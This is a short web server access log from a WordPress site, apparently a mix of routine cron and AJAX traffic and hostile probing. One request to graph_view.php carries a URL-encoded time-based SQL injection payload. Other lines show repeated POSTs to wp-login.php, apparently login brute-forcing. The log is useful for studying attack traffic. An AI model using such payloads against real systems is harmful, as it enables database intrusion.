165.232.54.158 - - [14/Jan/2026:03:46:09 +0800] "GET /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:03:46:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768333575.6864809989929199218750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:46:13 +0800] "GET /wp-login.php HTTP/1.1" 200 3204 "https://nutritaste.com.au/login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:03:46:16 +0800] "GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [14/Jan/2026:04:32:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768336352.0160009860992431640625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
88.198.129.223 - - [14/Jan/2026:04:32:28 +0800] "POST /wp-login.php HTTP/1.1" 503 7313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
103.4.122.14 - - [14/Jan/2026:04:32:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768336357.0779280662536621093750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:04:32:35 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
157.15.90.182 - - [14/Jan/2026:05:03:08 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:05:25:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768339523.9441909790039062500000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
172.104.208.183 - - [14/Jan/2026:05:25:09 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0"
103.4.122.14 - - [14/Jan/2026:05:25:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768339528.2774350643157958984375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:05:25:26 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
